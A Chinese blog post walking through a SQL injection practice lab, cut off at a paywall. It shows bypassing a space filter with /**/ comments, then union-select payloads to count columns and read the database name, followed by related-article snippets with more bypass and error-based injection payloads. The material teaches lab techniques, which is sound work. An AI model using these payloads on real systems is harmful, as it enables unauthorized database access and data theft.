SQL靶场练习之二(空格绕过、报错注入)

最新推荐文章于 2025-03-18 18:03:53 发布
最新推荐文章于 2025-03-18 18:03:53 发布
阅读量809 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: SQL 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/lorezon/article/details/103992602
本文介绍了SQL靶场练习中的空格绕过方法,通过在URL后添加特殊字符实现绕过。接着展示了如何判断SQL注入的存在,并探讨了字段、回显点的判断。此外,文章还详细讲解了查询数据库名、表名及内容的过程,以及报错注入的识别和利用,最后展示了查询flag值的步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

空格绕过

初始页面是这样的:
在这里插入图片描述

0x00判断是否存在注入

name后面加个单引号,发现页面返回异常:
在这里插入图片描述判断存在注入。

0x02常规拼接

name’ and 1=1
在这里插入图片描述返回异常,显示ERROR NO SPACE,错误无空格。想办法把空格取代掉,使用/**/拼接语句name’/**/and/**/1=1%23
在这里插入图片描述页面返回正常,说明绕过成功。

0x03判断字段

name’/**/order/**/by/**/5%23,页面返回正常,将5改成6则返回错误:
在这里插入图片描述说明字段为5。

0x04判断回显点

name’/**/union/**/select/**/1,2,3,4,5%23
在这里插入图片描述回显点为1,2,3.

0x05查询数据库名

name’/**/union/**/select/**/1,database(),3,4,5%23
在这里插入图片描述查询到数据库名为:erercises

0x06查询数据库中表名

name’/**/union/**/select/**/1,group_concat(table_name)
最低0.47元/天 解锁文章

200万优质内容无限畅学
WAF - SQL注入绕过安全狗靶场实战
weixin_54771278的博客
05-26 749
WAF - SQL注入绕过安全狗靶场实战 实验介绍 安全狗,互联网安全品牌,云安全服务与解决方案提供商 。 企业用户遍布互联网金融、电商、游戏、移动互联网、政府单位等多个行业。 网站安全狗 : 面向网站安全,包括:网马扫描及查杀(自有引擎,只针对网页木马);网马主动防御功能(可主动拦截网马上传和访问的动作);防SQL注入功能、防XSS跨站攻击功能;防盗链防下载;以及防止CC攻...
2024年网络安全最新【Web安全】SQL各类注入绕过
2401_84281648的博客
05-03 709
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
SQL注入绕过空格
nihao_ma_的博客
05-07 2409
SQL注入空格绕过技巧
空格绕过
My笔记的博客
10-11 576
这里我们在admin’ 后面加上一个空格发现被过滤了:测一下列数,这里没有正常输出,说明没有5列:我们前面说过,再测回显位的时候要让前面的id等于数据库中不存在的值,我们改成1,回显了2,说明回显列在第二位,后面就是正常操作拿数据:空格绕过里的%0b、%0c、%0d这些都是可以绕过的。
SQL注入空格与逗号过滤的绕过技巧总结
最新发布
HuaweiLab_Peach的博客
03-18 1567
大家好,今天想和大家分享一些实用的技巧,专门针对渗透测试或CTF比赛中可能遇到的特殊字符过滤问题。这篇文章主要讲解当遇到空格和逗号过滤时,如何巧妙地进行绕过,让我们的SQL注入成功执行。
sql注入报错注入 练习
qq_41619455的博客
08-02 366
sql 报错注入
SQL-Labs靶场“26-28”关通关教程
钟言的博客
02-26 9990
本关SQL-Labs靶场的26-28关通关教程,详细内容包含了、二十六关 基于GET过滤空格以及注释报错注入 1、源码分析 2、绕过思路 3、updatexml报错注入 二、二十六a关 基于GET过滤空格注释字符型注入 1、源码分析 2、绕过思路 3、时间盲注 三、二十七关 基于union及select的过滤单引号注入 1、源码分析 2、绕过思路 3、联合查询注入 4、updatexml报错注入 四、二十七a关 基于union及select的过滤双引号注入 1、源码分析 2、绕过思路 3、联合查询注入等等
mysql sql注入漏洞修复_SQL注入漏洞解析与靶场复现
weixin_36043375的博客
02-26 1471
1. 概述SQL注入(SQL Injectioin)漏洞是注入漏洞中危害性最高的漏洞之一。形成的原因主要是在数据交互过程中,前端的数据传入后端时,没有作严格的验证过滤导致传入的“数据”拼接到了SQL语句中。被数据库当作SQL语句的一部分执行,从而使得数据面临被脱库、恶意破坏篡改甚至造成整个系统权限沦陷等一系列危害。注入攻击的本质是把用户输入的数据当作代码执行。造成注入攻击有两个关键条件:①用户能够...
2024年最全【Web安全】SQL各类注入绕过(1),2024年腾讯网络安全高级面试题及答案
2401_84281655的博客
05-05 405
SQL结构化查询语言用于管理关系型数据库管理系统,SQL的范围包括数据插入、查询、更新和删除,数据库模式创建和修改,以及数据访问控制。所谓关系型数据库,就像一张表,一个数据库中有很多的表,每一张表可以存储不同的内容。在一张表中,有列名也就是每一列的属性名称,如姓名、地址等,我们选取数据时,只需要知道数据库名、表名、列名以及条件,即可选取想要的数据。在开始SQL注入之前,需要简单了解一下SQL的基本语法,可见菜鸟教程及其他博客,这里就不占用篇幅了。菜鸟教程-SQL,怎么学习呢?
报错注入绕过sql注入检测机制的一点思路
坚持硬核
01-28 692
相关的sql函数说明: rand() 用于产生一个0到1之间的随机数 floor() 向下取整 floor(rand()) 得到的值永远为0 floor(rand()*2) 得到的值可能为1可能为0 select floor(rand()*2) from 有很多数据的表名 有多少条数据就生成多少个0或者1,并且重复执行这句话,结果无法复现 但是如果给rand()传入一个随机数种子,比如0,反复执行结果是可以复现,生成的是比较固定的伪随机数:011011001110 select co
空格绕过方法
东隅的博客
02-21 1026
%20 %09 \t
mysql 绕过空格_SQL注入篇-绕过方法
weixin_39789042的博客
02-02 1481
检测目标网站****时,利用下图所示的unicode编码方式中的空格编码绕过检测。 在使用order by **进行注入判断时,使用%c0%20、%c0%a0这两种空格的编码对网站进行注入均无果(对网站没影响),而使用%e0%80%a0绕过方法会提示非法字符,说明后台对其进行了过滤。使用%u0020、%uff00时会出现下图所示错误(构造语句%u0020order%u0020by%u0020**...
文件上传--Upload-labs--Pass06--空格绕过
2302_79800344的博客
02-18 778
空格绕过
[SQL注入]CTFSHOW-----WEB6(空格绕过
Y4tacker的博客
08-05 6093
首先,通过抓包发现这个报错 去掉空格后恢复正常,因此我们得想到用/**/绕过空格 万能登陆密码登录 检测回显位置—得到回显位为2 查表名 查列名 爆数据
mysql 关键词绕过_SQL注入绕过技巧
weixin_42416119的博客
01-19 1097
1.绕过空格(注释符/* */,%a0):两个空格代替一个空格,用Tab代替空格%a0=空格%20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/最基本的绕过方法,用注释替换空格:/*注释*/使用浮点数:select * from users where id=8E0union select 1,2,3select * from users where id=8...
SQL注入报错注入绕过
m0_62886641的博客
04-23 463
复习笔记,欢迎大佬指正
mysql报错注入ctf_CTF练习平台——报错注入
weixin_42119989的博客
02-18 278
TIM截图20180208125700.png这道题过滤了单引号、双引号等,最主要是过滤了空格,根据mysql的特性,我们可以用换行符代替空格符这里我通过extractvalue报错注入语句如下http://103.238.227.13:10088/?id=1%0Aand%0aextractvalue(1,concat(0x7e,(select%0a@@version),0x7e))成功报错接下...
掌控靶场 尤里复仇回归sql-注入绕过防护getshell
sagat110的博客
12-27 670
央企扫地僧重拾渗透,在掌控学院的靶场练习闯关过程中,记录一些心得体会,信息收集、sql注入、弱口令、一句话木马等手段的综合利用,成功拿到flag
SQL注入 空格转换为空绕过
m_de_g的博客
12-09 1861
SQL注入 空格转换为空绕过 一、基础知识 1.preg_replace函数 preg_replace(mixed $pattern,mixed $replacement,mixed $subject):执行一个正则表达式的搜索和替换。 $pattern:要搜索的模式,可以是字符串或一个字符串数组 $replacement:用于替换的字符串或字符串组。 $subject:要搜索替换的目标字符串或字符串数组 function blacklist($id) { $id= preg_replace('/or/
dvwa靶场中初级sql注入
07-28
在DVWA(Damn Vulnerable Web Application)靶场中,初级SQL注入是一种常见的漏洞类型。SQL注入是一种攻击技术,通过在Web应用程序中注入恶意的SQL代码来绕过应用程序的安全控制,从而获取非法访问或执行未经授权的操作。 下面是一些在DVWA靶场中进行初级SQL注入的步骤: 1. 登录DVWA:首先,登录到DVWA靶场。你可以在浏览器中输入`http://localhost/dvwa/login.php`,然后使用默认的用户名和密码登录(默认用户名:admin,密码:password)。 2. 设置安全级别:DVWA有不同的安全级别可供选择。在这个例子中,将安全级别设置为"低"。你可以在页面顶部的安全选项中找到并选择安全级别。 3. 选择"SQL Injection":在DVWA的主菜单中,选择"SQL Injection"。这将带你进入一个页面,你可以在这个页面上进行SQL注入攻击。 4. 探测注入点:在页面上,你将看到一个输入框,用于输入用户ID。首先,尝试输入一个常规的用户ID(如1)并提交表单。观察页面的响应,看是否存在任何异常或错误信息。如果没有出现错误,则说明该输入点可能存在注入漏洞。 5. 进行注入攻击:在用户ID输入框中,尝试输入一些注入代码,如`' OR '1'='1`。这是一种常见的注入技巧,目的是绕过应用程序的验证逻辑。提交表单并观察页面的响应。如果页面显示了所有用户的信息,说明注入成功。 请注意,这只是一个简单的示例,实际的SQL注入攻击可能更加复杂。在实际环境中,进行SQL注入攻击是不道德和非法的,除非你有合法的授权和目的。在学习和测试过程中,务必遵守法律和道德规范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值